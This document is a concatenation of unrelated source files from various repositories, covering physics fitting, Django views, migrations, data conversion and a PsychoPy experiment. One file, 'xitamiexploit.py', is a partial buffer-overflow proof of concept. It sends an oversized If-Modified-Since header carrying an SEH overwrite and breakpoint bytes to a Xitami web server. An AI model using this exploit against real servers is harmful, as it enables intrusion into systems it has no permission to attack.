                     [ 0 ,0.5*pymiss, 0 , 0 , 0 , 0.5*pymiss , 0 , 0 ]])
    A = A/Mnorm # normalize A
    # print np.linalg.det(A)
    #A inverse
    # print A
    Ainv = A.I
    #B matrix
    B = np.matrix([[-1,1,0,0,0,0,0,0],
                   [0,-1,1,0,0,0,0,0],
                   [0,0,-1,1,0,0,0,0],
                   [0,0,0,0,0,0,0,0],
                   [0,0,0,0,-1,1,0,0],
                   [0,0,0,0,0,-1,1,0],
                   [0,0,0,0,0,0,-1,1],
                   [0,0,0,0,0,0,0,0]])
    #C vector
    C = np.matrix([ 2*minkowskidot(p1,p2) + 2*minkowskidot(p1,p3) + m1square,
                    2*minkowskidot(p2,p3) + m2square,
                    m3square,
                    pxmiss**2,
                    2*minkowskidot(p5,p6) + 2*minkowskidot(p5,p7) + m5square,
                    2*minkowskidot(p6,p7) + m6square,
                    m7square,
                    pymiss**2])
    C = C/Mnorm**2 # normalize C
    # print C
    # Composite matrix & vector D and E
    D = np.dot(Ainv,B)
    E = np.dot(Ainv,C.T)
    # store D and E
    Dlist.append(D)
    Elist.append(E)
    # Store determinants of A w&w/o smearing
    # Adetlist = np.append(Adetlist, np.linalg.det(A))
    # A_nosmeardetlist = np.append(A_nosmeardetlist, np.linalg.det(A_nosmear))
# ===========
# From here on we can forget about the event momenta, everything
# is stored in Dn and En for each event. Time to guess the masses.
# ===========
# # Now to make a mass hypothesis (guess the correct one)
# MZ = 5.45421001e+02 # Mass of ~uL
# MY = 1.80337030e+02 # Mass of ~chi02
# MX = 1.44059825e+02 # Mass of ~eR
# MN = 9.70071979e+01 # Mass of ~chi01 (dark matter!)
# MZprim = MZ
# MYprim = MY
# MXprim = MX
# MNprim = MN
# M = np.matrix([ MZ**2 , MY**2 , MX**2 , MN**2 , MZprim**2 , MYprim**2 , MXprim**2 , MNprim**2 ])
# M = M/Mnorm
# print M
# # # Calculate the "chi-squared" error of the correct hypothesis
# P = [] # store Pn
# xisquared = 0
# offshell = [] # list to store p4nsquared - MN**2
# for n in range(N):
# Pn = np.dot(Dlist[n],M.T) + Elist[n]
# P.append(Pn) #store in case needed
# #print "hei", Pn.shape
# p4nsquared = Pn[3,0]**2 - Pn[0,0]**2 - Pn[1,0]**2 - Pn[2,0]**2
# p8nsquared = Pn[7,0]**2 - Pn[4,0]**2 - Pn[5,0]**2 - Pn[6,0]**2
# xisquared += (p4nsquared - MN**2)**2 + (p8nsquared - MNprim**2)**2
# offshell.append(abs(p4nsquared-MN**2))
# offshell.append(abs(p8nsquared-MNprim**2))
# print "xisquared", xisquared/Mnorm**2
# print np.mean(offshell)
# === Plot some results ===
# plt.hist(invariant_mass_between_c1_leptons, bins=100)
# plt.title('Distribution of lepton pair invariant mass in %d events.' % N)
# plt.xlabel(r'$m_{l^+l^-}$')
# plt.ylabel('Occurences')
# plt.show()
# Plot det(A) scatter smear vs nosmear
# plt.loglog(abs(A_nosmeardetlist), abs(Adetlist), 'bx')
# plt.hold('on')
# plt.plot([min(abs(Adetlist)),max(abs(Adetlist))], [min(abs(Adetlist)),max(abs(Adetlist))], 'r')
# plt.title('Per-event det(A) unsmeared vs smeared, smearing resolution %.1f' % resolution)
# plt.xlabel(r'$\mathrm{det}(A_\mathrm{non-smear})$')
# plt.ylabel(r'$\mathrm{det}(A_\mathrm{smear})$')
# plt.show()
# ============ Minimization to best fit =================
# import minuit
# xi-squared function to minimize with identical chains
def xisquared_identical_chains(MZ, MY, MX, MN, Nevents, i): #, MZp, MYp, MXp, MNp):
    """Webber "chi-squared" for a mass hypothesis, assuming both decay chains
    carry identical sparticle masses.

    Uses the module-level Dlist/Elist (per-event matrices) and Mnorm.
    Evaluates events [i*Nevents, (i+1)*Nevents), i.e. bin *i* of size *Nevents*.
    Returns the average squared off-shellness of the two invisible momenta.
    """
    Nevents = int(Nevents)
    i = int(i)
    # Duplicate the masses for the primed (second) chain.
    MZp, MYp, MXp, MNp = MZ, MY, MX, MN
    # Webber's M vector of squared masses, normalised by Mnorm^2.
    M = np.matrix([MZ**2, MY**2, MX**2, MN**2, MZp**2, MYp**2, MXp**2, MNp**2])
    M = M / Mnorm**2
    total = 0
    for n in range(i * Nevents, (i + 1) * Nevents):
        # Reconstructed invisible momenta for event n under hypothesis M.
        Pn = np.dot(Dlist[n], M.T) + Elist[n]
        p4sq = Pn[3, 0]**2 - Pn[0, 0]**2 - Pn[1, 0]**2 - Pn[2, 0]**2
        p8sq = Pn[7, 0]**2 - Pn[4, 0]**2 - Pn[5, 0]**2 - Pn[6, 0]**2
        # Penalise off-shellness of both neutralinos (p4/p8 are normalized by MN).
        total += (p4sq - M[0, 3])**2 + (p8sq - M[0, 7])**2
    return total / float(Nevents)
# Plot xi^2 as function of some masses to see how bumpy the landscape is.
# NOTE(review): 2-D meshgrids are fed straight through
# xisquared_identical_chains, relying on numpy broadcasting inside the
# function to vectorize over the grid -- confirm this actually holds.
from mpl_toolkits.mplot3d import Axes3D
minm = 0.0   # lower scan bound, as a fraction of the true mass
maxm = 3     # upper scan bound, as a fraction of the true mass
Nlinspace = 300
Nevents=25
bin_number=1
msquark_linspace = np.linspace(Msquark*minm, Msquark*maxm, Nlinspace)
mchi2_linspace = np.linspace(Mchi2*minm, Mchi2*maxm, Nlinspace)
mslepton_linspace = np.linspace(Mslepton*minm, Mslepton*maxm, Nlinspace)
mchi1_linspace = np.linspace(Mchi1*minm, Mchi1*maxm, Nlinspace)
msquark_mesh1, mchi2_mesh = np.meshgrid(msquark_linspace, mchi2_linspace)
msquark_mesh2, mslepton_mesh = np.meshgrid(msquark_linspace, mslepton_linspace)
msquark_mesh3, mchi1_mesh = np.meshgrid(msquark_linspace, mchi1_linspace)
# mslepton_mesh2, mchi1_mesh2 = np.meshgrid(mslepton_linspace, mchi1_linspace)
# Each surface scans two masses while holding the other two at their true values.
xi2_plot_squarkchi2 = np.log10(xisquared_identical_chains(msquark_mesh1, mchi2_mesh, Mslepton, Mchi1, Nevents,bin_number-1))
xi2_plot_squarkslepton = np.log10(xisquared_identical_chains(msquark_mesh2, Mchi2, mslepton_mesh, Mchi1, Nevents, bin_number-1))
xi2_plot_squarkchi1 = np.log10(xisquared_identical_chains(msquark_mesh3, Mchi2, Mslepton, mchi1_mesh, Nevents, bin_number-1))
# xi2_plot_sleptonchi1 = np.log10(xisquared_identical_chains(480, 150, mslepton_mesh2, mchi1_mesh2, Nevents, bin_number-1))

# Plot 1: squark-chi2
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', )
ax.set_zscale(u'linear')
ax.plot_wireframe(msquark_mesh1, mchi2_mesh, xi2_plot_squarkchi2, rstride=10, cstride=10, color='k')
# plt.title('test')
ax.set_xlabel(r'$m_{\tilde q}$', {'fontsize':20})
ax.set_ylabel(r'$m_{\tilde \chi_2^0}$', {'fontsize':20})
ax.set_zlabel(r'$\log (\xi^2)$', {'fontsize':18})
plt.show()
# Plot 2: squark-slepton
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', )
ax.set_zscale(u'linear')
ax.plot_wireframe(msquark_mesh2, mslepton_mesh, xi2_plot_squarkslepton, rstride=10, cstride=10, color='k')
# plt.title('test')
ax.set_xlabel(r'$m_{\tilde q}$', {'fontsize':20})
ax.set_ylabel(r'$m_{\tilde l}$', {'fontsize':20})
ax.set_zlabel(r'$\log (\xi^2)$', {'fontsize':18})
plt.show()
# Plot 3: squark-chi1
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d', )
ax.set_zscale(u'linear')
ax.plot_wireframe(msquark_mesh3, mchi1_mesh, xi2_plot_squarkchi1, rstride=10, cstride=10, color='k')
# plt.title('test')
ax.set_xlabel(r'$m_{\tilde q}$', {'fontsize':20})
ax.set_ylabel(r'$m_{\tilde \chi_1^0}$', {'fontsize':20})
ax.set_zlabel(r'$\log (\xi^2)$', {'fontsize':18})
plt.show()
# print 'smearing', "%2.2f ," % smearing_resolution
# print 'True masses', true_values
# print 'Best-fit values', best_fit
# print 'relative_fit_error', relative_fit_error, ', abs mean fit error', "%.2e" %np.mean(np.abs(relative_fit_error))
# print "number of runs =", len(xisquaredlist), ", mean xi^2 =", np.mean(xisquaredlist), "final xi^2 =", xisquaredlist[-1]
# Minitial = [5.5e2, 1.8e2, 1.5e2, 1e2, 5.5e2, 1.8e2, 1.5e2, 1e2] # Starting point for parameter scan
# Nlist = range(100,1000, 50)
# relative_fit_error_list = []
# for N in Nlist:
# true_values, best_fit, relative_fit_error = minimize(N, 0, Minitial)
# relative_fit_error_list.append(relative_fit_error[0])
# plt.plot(relative_fit_error_list)
# plt.show()
|
[
"j.e.midtbo@fys.uio.no"
] |
j.e.midtbo@fys.uio.no
|
de88552d5cb42be220489857bedbf80a50e4b048
|
d442aa2dd41cc8f046d1c44fd80c069689c8ac01
|
/django_cloud_tasks/views.py
|
5a91d722bce60a45bcc3b6101ecd14ce060c1913
|
[
"Apache-2.0"
] |
permissive
|
guilhermearaujo/django-cloud-tasks
|
27593d616937184bf708318da074f2017e85e25f
|
946712258a23a00062d071031c40553946ebfe6a
|
refs/heads/main
| 2023-02-03T16:43:32.990856
| 2020-12-18T19:04:07
| 2020-12-18T19:04:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,667
|
py
|
import base64
import json
from typing import Dict
from django.apps import apps
from django.http import HttpResponse
from django.views.generic import View
class GoogleCloudTaskView(View):
    """Dispatch POSTed Cloud Tasks payloads to the task registered under
    ``task_name`` in the ``django_cloud_tasks`` app config."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Snapshot the task registry once per view instance.
        self.tasks = self._get_available_tasks()

    def _get_available_tasks(self):
        # Hook: subclasses override to expose a different registry.
        return apps.get_app_config('django_cloud_tasks').tasks

    def post(self, request, task_name, *args, **kwargs):
        try:
            task_class = self.tasks[task_name]
            # FIX: parse through the _parse_task_args hook instead of calling
            # json.loads(request.body) directly -- otherwise subclass
            # overrides (e.g. GoogleCloudSubscribeView's Pub/Sub envelope
            # unwrapping) are silently bypassed. For this base class the
            # behavior is unchanged: the hook is plain json.loads.
            data = self._parse_task_args(body=request.body)
            output, status = task_class().execute(data=data)
            if status == 200:
                result = {'result': output}
            else:
                result = {'error': output}
        except KeyError:
            status = 404
            result = {'error': f"Task {task_name} not found"}
        response = HttpResponse(status=status, content=json.dumps(result), content_type='application/json')
        return response

    def _parse_task_args(self, body: str) -> Dict:
        # Default: the request body is a plain JSON document.
        return json.loads(body)
# More info: https://cloud.google.com/pubsub/docs/push#receiving_messages
class GoogleCloudSubscribeView(GoogleCloudTaskView):
    """Task view variant that handles Pub/Sub push-subscription envelopes."""

    def _get_available_tasks(self):
        # Pub/Sub handlers live in a separate registry from plain tasks.
        return apps.get_app_config('django_cloud_tasks').subscribers

    def _parse_task_args(self, body: str) -> Dict:
        """Unwrap a Pub/Sub push envelope into message + attributes."""
        envelope = super()._parse_task_args(body=body)
        parsed = {}
        if 'data' in envelope:
            # The payload arrives base64-encoded; decode, then parse the JSON inside.
            decoded = base64.b64decode(envelope['data']).decode('utf-8')
            parsed['message'] = json.loads(decoded)
        parsed['attributes'] = envelope.get('attributes', {})
        return parsed
|
[
"joao@daher.dev"
] |
joao@daher.dev
|
18c4535268b877c0562c99cbc76515ee37ca383d
|
9c9d08fd1821a3183bf5640a969cf96464ca748f
|
/migrations/versions/b165aaa7dbae_.py
|
64fb4b757f0b956cf7f9ad1887fb1b4b27de4da6
|
[] |
no_license
|
pengjinfu/blog-1
|
f102a0d5cf20dfd8a6d0293ebadbaf44da0c42ef
|
01025a3d311505331d20a8caf2c66143c781af15
|
refs/heads/master
| 2020-06-26T13:08:10.891939
| 2017-06-22T09:18:31
| 2017-06-22T09:18:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 668
|
py
|
"""empty message
Revision ID: b165aaa7dbae
Revises: 24cd77a2728d
Create Date: 2017-03-18 16:17:25.670714
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b165aaa7dbae'
down_revision = '24cd77a2728d'
branch_labels = None
depends_on = None
def upgrade():
    """Schema upgrade: add a nullable ``avatar_hash`` VARCHAR(32) column to ``users``."""
    # ### commands auto generated by Alembic - please adjust! ###
    # 32 chars -- presumably caches an MD5 hex digest for avatar lookups;
    # confirm against the User model before relying on that.
    op.add_column('users', sa.Column('avatar_hash', sa.String(length=32), nullable=True))
    # ### end Alembic commands ###
def downgrade():
    """Schema downgrade: drop the ``users.avatar_hash`` column added by upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('users', 'avatar_hash')
    # ### end Alembic commands ###
|
[
"1782964880@qq.com"
] |
1782964880@qq.com
|
7f3bff7b12d76bdaf22d047eafd52e5a2dcf4f36
|
3c898b1aec7009110c63504d5a56e31914625d1b
|
/acrylamid/filters/rstx_code.py
|
a777d9886f403dcd1875f77ad78ddad7f3ac51cf
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
MagicSword/acrylamid
|
e294b151ed6305f37fc5a5fdd4f1f0fb999a22f7
|
6f34bc5fb2175af1103aec7a910ef48a6842de03
|
refs/heads/master
| 2021-01-16T21:30:58.564719
| 2012-06-22T16:00:50
| 2012-06-22T16:45:38
| 4,817,948
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,457
|
py
|
# -*- encoding: utf-8 -*-
#
# Copyright: (c) 2010-2012 by Rafael Goncalves Martins
# License: GPL-2, see https://hg.rafaelmartins.eng.br/blohg/file/tip/LICENSE for more details.
from docutils import nodes
from docutils.parsers.rst import Directive
match = 'code'
class Code(Directive):
    """reStructuredText directive that creates a pre tag suitable for
    decoration with http://alexgorbatchev.com/SyntaxHighlighter/

    Usage example::

        .. source:: python

            print "Hello, World!"

        .. raw:: html

            <script type="text/javascript" src="http://alexgorbatchev.com/pub/sh/current/scripts/shCore.js"></script>
            <script type="text/javascript" src="http://alexgorbatchev.com/pub/sh/current/scripts/shBrushPython.js"></script>
            <link type="text/css" rel="stylesheet" href="http://alexgorbatchev.com/pub/sh/current/styles/shCoreDefault.css"/>
            <script type="text/javascript">SyntaxHighlighter.defaults.toolbar=false; SyntaxHighlighter.all();</script>
    """

    required_arguments = 1   # the brush (language) name
    optional_arguments = 0
    has_content = True

    def run(self):
        self.assert_has_content()
        self.options['brush'] = self.arguments[0]
        html = '''\
<pre class="brush: %s">
%s
</pre>
'''
        # FIX: escape the listing for HTML. The previous code did
        # .replace('<', '<') -- a no-op (almost certainly a mangled '&lt;')
        # that let '<' in the source break out of the <pre> element.
        # '&' is escaped first so pre-existing entities are preserved verbatim.
        body = "\n".join(self.content).replace('&', '&amp;').replace('<', '&lt;')
        return [nodes.raw('', html % (self.options['brush'], body),
                          format='html')]
def makeExtension():
    """Entry point used by acrylamid's filter loader; expose the directive class."""
    return Code
|
[
"info@posativ.org"
] |
info@posativ.org
|
052e51ffcec636fa0d7bb9772bc936bb1e455464
|
686054d9b42c0c679dbbfb495e3daf7eafa6ca90
|
/import/method_V1/asc_to_csv.py
|
eabed0b9c55e0d0dbe6de3eff11799b157580fee
|
[] |
no_license
|
danielzhou/Rainflux
|
8d66d63d65f0481647383c2c7704aca1b249e3bb
|
d3ceb68ba3967a37fc877bd4acd1ebae6e333076
|
refs/heads/master
| 2020-09-29T15:13:22.744967
| 2020-03-07T08:14:53
| 2020-03-07T08:14:53
| 227,060,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,535
|
py
|
# -*- coding:utf-8 -*-
# Tools: PyCharm 2018.2
# Author: DING YI
# FIX: dunder spelling -- was `___date__` (three leading underscores).
__date__ = '2018/12/4 2:57'
import numpy as np
import pandas as pd
import time
import os
# Return the creation timestamp of a file
def get_FileCreateTime(filePath):
    """Return the creation time of *filePath* as epoch seconds.

    Note: os.path.getctime is true creation time on Windows, but the
    inode-change time on Unix.
    """
    return os.path.getctime(filePath)
# Timing start
# start = time.clock()
# Timestamp of the source file's creation time (used as the time origin)
file_path = r'C:\Users\user\Desktop\ZYJ_InfluxDB\data\origin_data\point_19--22_part.asc'
time_creative = get_FileCreateTime(file_path)
# Load the file as a single raw-text column named 'Point'
df = pd.DataFrame(pd.read_csv(file_path, header=None, names = ['Point']))
# Find the row index of the 'END' marker that terminates the ASC header
line_end = df[df['Point'].isin(['END'])].index.values
# print(line_end)
# Drop the header rows (everything up to and including 'END')
df_data = df.drop(np.arange(line_end+1), inplace=False)
columns_family = ['Point1','Point2','Point3','Point4','Point5','Point6','Point7','Point8','Point9','Point10',
                  'Point11','Point12','Point13','Point14','Point15','Point16','Point17','Point18','Point19','Point20',
                  'Point21','Point22','Point23','Point24','Point25','Point26','Point27','Point28','Point29','Point30',
                  'Point31','Point32','Point33','Point34','Point35','Point36','Point37','Point38','Point39','Point40',
                  'Point41','Point42','Point43','Point44','Point45','Point46','Point47','Point48','Point49','Point50',
                  'Point51','Point52','Point53','Point54','Point55','Point56','Point57','Point58','Point59','Point60',
                  'Point61','Point62','Point63','Point64','Point65','Point66','Point67','Point68','Point69','Point70',
                  'Point71','Point72','Point73','Point74','Point75','Point76','Point77','Point78','Point79','Point80',
                  'gps:Latitude','gps:Longitude','gps:Altitude','gps:EastVelocity','gps:NorthVelocity','gps:UpVelocity','gps:NumberOfSatellites','gps:Speed']
# Split each row into columns; the index becomes a timestamp derived from the
# row number at 1024 samples/second, offset by the file creation time.
# df_split = pd.DataFrame((x.split(" ") for x in df_data['Point']), index=((df_data.index-76)/1024+time_creative), columns=['Point1','Point2','Point3','Point4','Point5','Point6','Point7','Point8','Point9','Point10','Point11','Point12','Point13','Point14','Point15','Point16','Point17','Point18','Point19','Point20','Point21','Point22','Point23','Point24','Point25','Point26','Point27','Point28','Point29','Point30','Point31','Point32','Point33','Point34','Point35','Point36','Point37','Point38','Point39','Point40','Point41','Point42','Point43','Point44','Point45','Point46','Point47','Point48','Point49','Point50','Point51','Point52','Point53','Point54','Point55','Point56','Point57','Point58','Point59','Point60','Point61','Point62','Point63','Point64','Point65','Point66','Point67','Point68','Point69','Point70','Point71','Point72','Point73','Point74','Point75','Point76','Point77','Point78','Point79','Point80','gps:Latitude','gps:Longitude','gps:Altitude','gps:EastVelocity','gps:NorthVelocity','gps:UpVelocity','gps:NumberOfSatellites','gps:Speed'])
# NOTE(review): " +" is a *literal* two-character delimiter (space then plus),
# not a regex -- this only works if the values are space-separated and
# '+'-sign-prefixed. TODO confirm against the ASC format.
df_split = pd.DataFrame((x.split(" +") for x in df_data['Point']), index=((df_data.index-int(line_end)+1)/1024+time_creative))
# Results still contain whitespace/tabs; a "\\s+" argument was tried below, but
# str.split treats it literally too, leaving everything in one column.
# df_split = pd.DataFrame((x.split("\\s+") for x in df_data['Point']), index=((df_data.index-int(line_end)+1)/1024+time_creative))
# Rename the columns (truncate the name list to however many columns we got)
df_split.columns = columns_family[:df_split.columns.size]
df_split.index.name = "Time"
# Export to csv
df_split.to_csv("./csv_test.csv", index=True, sep=',')
# Timing end
# end = time.clock()
# elapsed = end - start
# print("Time used:", elapsed)
|
[
"1358304569@qq.com"
] |
1358304569@qq.com
|
691b52ef9217d81a10cc5e6df8a8e390660b4769
|
7bd150f13b92010ae3d2b852ed291d8e71f57199
|
/analytics/util.py
|
32a75c382bc4db8e2fefe276509f41aa4a0f17a0
|
[
"MIT"
] |
permissive
|
SidSachdev/CurrentLocationAPI
|
5438374ffc9d555a56294bfec427ea8e95ec9247
|
cc2c8b9e7381c289a29ebd2a59a135847eb9a957
|
refs/heads/master
| 2022-09-06T18:46:31.357310
| 2020-06-02T04:54:44
| 2020-06-02T04:54:44
| 268,671,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,608
|
py
|
import logging
from fuzzywuzzy import fuzz
from models.merchant import Merchant
from constants import Threshold
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger("analytics.util.py")
def get_matching_merchants(sess, request_id, user_id, visits, search_string):
    """
    Narrow a user's visits to those whose merchant name fuzzy-matches the
    search string (ratio strictly above the configured threshold).

    :param sess: Session object for the DB
    :param request_id: Request ID tracking for debugging
    :param user_id: User id echoed into each result row
    :param visits: list of the user's visits, unfiltered
    :param search_string: search string to match merchant names against
    :return: list of dicts describing the matching visits
    """
    matches = []
    log.debug(
        "[{}] Fuzzy matching for search string {} user_id: {}".format(
            request_id, search_string, user_id
        )
    )
    for visit in visits:
        merchant = Merchant.get_by_pk(sess, request_id, visit.merchant_pk)
        score = fuzz.ratio(merchant.merchant_name, search_string)
        if score <= Threshold.FUZZY_MATCH_THRESHOLD:
            # below (or at) the cutoff -- not a match
            continue
        matches.append(
            {
                "visitId": visit.visit_id,
                "timestamp": visit.timestamp,
                "merchant": {
                    "merchantId": merchant.merchant_id,
                    "merchantName": merchant.merchant_name,
                },
                "user": {"userId": user_id},
            }
        )
    return matches
|
[
"noreply@github.com"
] |
SidSachdev.noreply@github.com
|
b590e1016cb64dc5b3b45457027b0c553b39280f
|
55e28e35db5bf6a844df3fb47080500b115a893e
|
/day11/s5.py
|
dc0aa1f8cdc6fd1556254c9900278c56cc2c6fc2
|
[] |
no_license
|
pylarva/Python
|
5743ffa4a69db42b642d51b62f9e9b69ddbc1a72
|
71b484950e6dbdcf708726a68a3386d0d6ddc07f
|
refs/heads/master
| 2020-04-19T09:11:11.195393
| 2017-11-16T07:32:59
| 2017-11-16T07:32:59
| 67,507,687
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:pylarva
# bolg:www.lichengbing.com
import threading
def func(i, e):
print(i)
e.wait()
print(i + 100)
event = threading.Event()
for i in range(10):
t = threading.Thread(target=func, args=(i, event,))
t.start()
event.clear()
inp = input('>>>')
if inp == '1':
event.set()
|
[
"1326126359@qq.com"
] |
1326126359@qq.com
|
105aa9c86cfe3ecb2b1fe883e6274b5107f93133
|
2ecc0fb80a7ab46612800803db06e3538a50a396
|
/DP/jump-game-ii.py
|
16cc57c67f6a4b925df22d4334adcb0b9dbb49ac
|
[] |
no_license
|
vishaalgc/codes
|
f3da924694120c9da199e4dfdd73481774bb149b
|
4c8a8b6197adfaaafd744ded3a50580d517fc9f1
|
refs/heads/main
| 2023-06-24T20:02:48.843869
| 2021-07-20T14:27:34
| 2021-07-20T14:27:34
| 378,338,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
class Solution:
def jump(self, nums):
n = len(nums)
dp = [2**31]*n
dp[0] = 0
for i in range(n):
end = nums[i]+i
for j in range(end,i,-1):
if j < n:
if dp[j] > dp[i]+1:
dp[j] = dp[i]+1
else:
break
print(i,j,dp)
# print(dp)
return dp[n-1]
s = Solution()
nums = [2,3,1,1,4]
# nums = [2,3,0,1,4]
# nums = [1]
# nums = [2,1]
nums = [1,2,3]
print(s.jump(nums))
|
[
"vishaalgc@gmail.com"
] |
vishaalgc@gmail.com
|
e5d6607fa91db255527d43aac41b23164fa6348e
|
b3f60d85f75a538282dfabb2b4afa6fe9ecfb19a
|
/Xitami/xitamiexploit.py
|
0069df7a4507cb9c549d70176549935f82aef2be
|
[] |
no_license
|
ironspideytrip/OSCE-Prep-Zero-day-practice
|
34ecf47e22cb1fb92d13cf04444e93c962cfb03f
|
4ff52ede0a74728f34f40950727870ecefb155af
|
refs/heads/master
| 2022-12-04T06:06:36.668936
| 2020-08-30T08:10:13
| 2020-08-30T08:10:13
| 280,714,382
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
#Need to update
import socket
import sys
host = "10.0.2.15"
port = 80
#B2 96 45 00(seh)
crash ="A" *72 + "\x7B\x46\x86\x7C"+ "\xcc\xcc\xcc\xcc" +"C" * (188-80) +"\xcc\xcc\xcc\xcc" +"\xB2\x96\x45"
req = "GET / HTTP/1.1\r\n"
req += "Host: 192.168.1.201\r\n"
req += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "Accept-Language: en-US,en;q=0.5\r\n"
req += "Accept-Encoding: gzip, deflate\r\n"
req += "Connection: close\r\n"
req += "Upgrade-Insecure-Requests: 1\r\n"
req += "If-Modified-Since: Wed, " + crash + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(req)
s.close()
|
[
"noreply@github.com"
] |
ironspideytrip.noreply@github.com
|
d619b9bfa01b6d2f8ba0985ab9d544101708f35d
|
54d508cb6f02bd21190aac5af1899f3f589e961a
|
/experiments/IMRT/aeft.py
|
5b464dc6dcd981d9023d6027cd553410657a171e
|
[] |
no_license
|
tqbwqing/DrThesis
|
27bef38853a089aab2712512cde26ea3d8edb05e
|
233b727d4332301b29d7cbd7012e2bdbc7a15fdd
|
refs/heads/master
| 2020-09-15T02:47:34.741544
| 2019-05-28T08:23:22
| 2019-05-28T08:23:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,303
|
py
|
# Neue AEFT-Version (26.05.17)
# Letztes Update 31.05.2017
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division
from psychopy import locale_setup, gui, visual, core, data, event, logging, sound
import numpy as np
import os
import threading
import sys
# declaration of global variables (used by response pad)
global green, left, right
right = False
left = False
green = False
def StartResponsePad():
import pyxid
global right, left, green
dev = pyxid.get_xid_devices()[0]
dev.reset_base_timer()
while True:
dev.poll_for_response()
if dev.response_queue_size() > 0:
response = dev.get_next_response()
if response['pressed'] == True:
if response['key'] == 3:
right = True
if response['key'] == 7:
green = True
if response['key'] == 2:
left = True
def StartRPThread():
rp = threading.Thread(target=StartResponsePad)
rp.daemon = True
rp.start()
class Trial:
def __init__(self, condition, minID, maxID):
trial_handler = data.TrialHandler(nReps=1, method='sequential',
trialList=data.importConditions(condition, selection='0:145'),
seed=None, name='Block_1')
self.TrialData = trial_handler.trialList
self.LastTrial = 0
self.ActiveTrial = 0
self.minID = minID
self.maxID = maxID
self.correct = 0
self.meanTime = 0
def NextTrial(self):
self.LastTrial = self.ActiveTrial
try:
ID = np.random.randint(self.minID, self.maxID)
# print("ID: " + str(ID)) (only for debugging purposes)
except:
print("ERROR: Trial List empty.")
raise
self.ActiveTrial = self.TrialData[ID]
try:
self.TrialData.pop(ID)
except:
print("ERROR: Trial List empty.")
raise
self.maxID += -1
def TrialBlock(self, number):
global left, right
self.Clock = core.Clock()
Achtung = visual.TextStim(win=myWin, name='Achtung',
text='Achtung!',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
continueRoutine = True
continueTrial = True
self.N = 0
self.N2 = self.maxID - self.minID
while continueTrial:
if self.N + 1 >= self.N2:
continueTrial = False
self.NextTrial()
target = sound.Sound(self.ActiveTrial['file_target'], secs=-1)
interleaved = sound.Sound(self.ActiveTrial['file_interleaved'], secs=-1)
targetStatus = 0
interleavedStatus = 0
continueRoutine_Buffer = False
continueRoutine = True
firstPress = True
self.Clock.reset()
while continueRoutine:
t = self.Clock.getTime()
if t <= 5.4:
right = False
left = False
if t >= 1 and targetStatus == 0:
Achtung.draw()
myWin.flip()
if t >= 2 and targetStatus == 0:
myWin.flip()
target.play()
targetStatus = 1
if t >= 5.4 and interleavedStatus == 0:
interleaved.play()
interleavedStatus = 1
if right and firstPress and interleavedStatus == 1:
continueRoutine_Buffer = True
right = False
firstPress = False
answer = "n"
tKey = t - 5.4
if left and firstPress and interleavedStatus == 1:
continueRoutine_Buffer = True
left = False
firstPress = False
answer = "c"
tKey = t - 5.4
if continueRoutine_Buffer and interleavedStatus == 1 and t >= 7.4:
continueRoutine = False
if interleavedStatus == 1 and t >= 9:
answer = "none"
tKey = -1
continueRoutine = False
if event.getKeys(keyList=["escape"]):
core.quit()
thisExp.addData('file_target',self.ActiveTrial['file_target'])
thisExp.addData('file_interleaved',self.ActiveTrial['file_interleaved'])
thisExp.addData('cond',self.ActiveTrial['cond'])
thisExp.addData('target',self.ActiveTrial['target'])
thisExp.addData('Ans_corr',self.ActiveTrial['Ans_corr'])
thisExp.addData('cond_inside',self.ActiveTrial['cond_inside'])
thisExp.addData('block_number', number)
thisExp.addData('trial_number', self.N)
thisExp.addData('time', tKey)
thisExp.addData('answer', answer)
if answer == str(self.ActiveTrial['Ans_corr']):
thisExp.addData('correct answer?', 1)
self.correct += 1
else:
thisExp.addData('correct answer?', 0)
thisExp.nextEntry()
self.meanTime += tKey / 16
self.N += 1
if __name__ == "__main__":
### Init of Psychopy stuff
expName = 'AEFT' #
expInfo = {u'session': u'001', u'participant': u'' , u'condition type': ['A', 'B']}
dlg = gui.DlgFromDict(dictionary=expInfo, title=expName)
if dlg.OK == False:
core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
if expInfo['condition type'] == "A":
conditions = "conditions_FormA.csv"
if expInfo['condition type'] == "B":
conditions = "conditions_FormB.csv"
filename = u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=None,
savePickle=True, saveWideText=True,
dataFileName=filename)
global myWin
myWin = visual.Window(size=(1920, 1200), fullscr=True, allowGUI=False,winType='pyglet',
monitor='testMonitor', screen=0, color=[-1.000,-1.000,-1.000], colorSpace='rgb',
blendMode='avg')
# Init of response pad
StartRPThread()
# Instructions
continueInstruction = True
while continueInstruction:
head_geninstr = visual.TextStim(win=myWin, name='head_geninstr',
